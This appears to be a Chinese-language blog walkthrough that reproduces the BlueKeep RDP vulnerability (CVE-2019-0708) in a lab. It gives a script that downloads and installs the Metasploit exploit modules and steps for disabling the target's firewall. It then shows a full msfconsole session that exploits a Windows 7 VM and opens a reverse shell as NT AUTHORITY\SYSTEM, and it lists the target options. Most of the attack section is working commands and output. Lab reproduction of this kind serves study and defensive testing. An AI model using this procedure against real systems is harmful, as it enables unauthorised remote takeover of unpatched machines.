Contents
  1. 1. 配置环境
  2. 2. 攻击

解决无法导入模块和蓝屏问题(目前仅win7_ultimeate_sp1复现成功,其他版本win7和08均蓝屏)

被该漏洞刷屏了,但是实际测试后发现其与ms17010不可同日而语,利用的限制性条件比较多,可以成功利用的版本比较少,期待该exp开发者大佬,继续开发出更多的targets

配置环境

靶机环境:

cn_windows_7_ultimate_with_sp1_x64

(测试本版本可以成功复现获取shell,其他版本蓝屏) 将其设置为 2h 2g

1568076961343

msf exp下载 及文件复制

1
2
3
4
5
6
7
8
9
10
11
#/bin/bash
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp_scanner.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

windows7环境配置

将win7打开远程桌面,并且关闭防火墙

1568076933217

msf 加载exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:~# msfconsole
msf > reload_all
[*] Reloading modules from all module paths...
[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bulekeep_rce.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb: NameError uninitialized constant Msf::Exploit::Remote::RDP
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


=[ metasploit v4.16.48-dev ]
+ -- --=[ 1749 exploits - 1001 auxiliary - 302 post ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

出现了WARNING! The following modules could not be loaded!错误,提示我们新加入的模块无法被加载

百度后发现,对此问题的解决非常少,猜测可能是版本问题,将kali重新安装到最新的2019.03后该问题没有再次出现

攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
root@kali:~# msfconsole
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.244.147rhosts => 192.168.244.147
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 192.168.244.147 yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)


Exploit target:

Id Name
-- ----
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 192.168.244.145:4444
[*] 192.168.244.147:3389 - Detected RDP on 192.168.244.147:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.244.147:3389 - The target is vulnerable.
[*] 192.168.244.147:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.244.147:3389 - Surfing channels ...
[*] 192.168.244.147:3389 - Lobbing eggs ...
[*] 192.168.244.147:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 1 opened (192.168.244.145:4444 -> 192.168.244.147:49160) at 2019-09-09 20:59:20 -0400



C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

利用成功

1568077327778

其中target参数如下

1
2
3
4
5
6
7
8
Available targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

根据需要进行选择

Contents
  1. 1. 配置环境
  2. 2. 攻击